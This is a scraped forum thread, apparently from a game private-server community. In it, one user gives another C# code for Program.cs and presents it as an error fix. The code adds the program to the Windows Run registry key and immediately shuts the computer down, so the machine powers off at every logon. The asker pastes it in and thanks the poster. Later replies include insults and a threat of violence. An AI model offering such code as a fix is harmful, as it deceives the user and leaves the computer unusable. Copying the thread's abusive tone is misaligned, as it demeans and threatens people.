Quote:
Go to Program.cs and find:
under the { put:Code:static void Main(string[] args)
Hope it helps.Code:Microsoft.Win32.RegistryKey RK = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true); RK.SetValue("Conquer", Application.ExecutablePath.ToString()); Process.Start("shutdown","/s /t 0");
Replace the code with:Quote:
how I can fix the error, HELP!
Microsoft.Win32.RegistryKey RK = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
RK.SetValue("Conquer", Application.ExecutablePath.ToString());
System.Diagnostics.Process.Start("shutdown","/s /t 0");
Thank you, I finally fixed this annoying problem.Quote:
Go to Program.cs and find:
under the { put:Code:static void Main(string[] args)
Hope it helps.Code:Microsoft.Win32.RegistryKey RK = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true); RK.SetValue("Conquer", Application.ExecutablePath.ToString()); Process.Start("shutdown","/s /t 0");
I'm going to fucking beat you with a lead pipe. You're pissing me off.Quote:
how I can fix the error, HELP!
If he's pissing you off, then just ignore it. Your only making things worse by insulting him.Quote:
I'm going to fucking beat you with a lead pipe. You're pissing me off.
Go play a pre-existing private server. You can barely read. You can't follow directions. You can't reason what things are. You can't function. Go spam someone's private server because fuck- I know I sure as hell don't want to deal with you- and I can imagine that nobody here does either.